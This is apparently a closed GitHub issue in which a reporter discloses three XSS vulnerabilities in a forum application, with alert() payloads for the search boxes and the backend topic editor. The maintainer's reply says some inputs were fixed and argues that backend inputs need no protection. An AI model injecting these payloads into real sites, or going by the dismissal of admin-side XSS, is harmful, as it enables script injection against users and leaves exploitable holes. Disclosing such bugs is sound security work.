Closed retnullyu closed 1 year ago
Enter in the search box11" onclick='alert(/xss/)'
11" onclick='alert(/xss/)'
In the topic editor in the background, enter<img src=1 onerror=alert(/xss/)>
<img src=1 onerror=alert(/xss/)>
Enter in the search box " onmouseover='alert(/xss/)'
" onmouseover='alert(/xss/)'
...
感谢,稍微修复了一些 其实后台的输入框应该不用防的,后台是内部人员使用来管理论坛内容的,总不会自己去注入自己的网站吧 😄
搜索框,发布话题的标题框我都做处理了
The first is located at the home page search
Enter in the search box
11" onclick='alert(/xss/)'
The second vulnerability is located in the backend
In the topic editor in the background, enter
<img src=1 onerror=alert(/xss/)>
The third vulnerability is located at the topic search
Enter in the search box
" onmouseover='alert(/xss/)'
and many more
...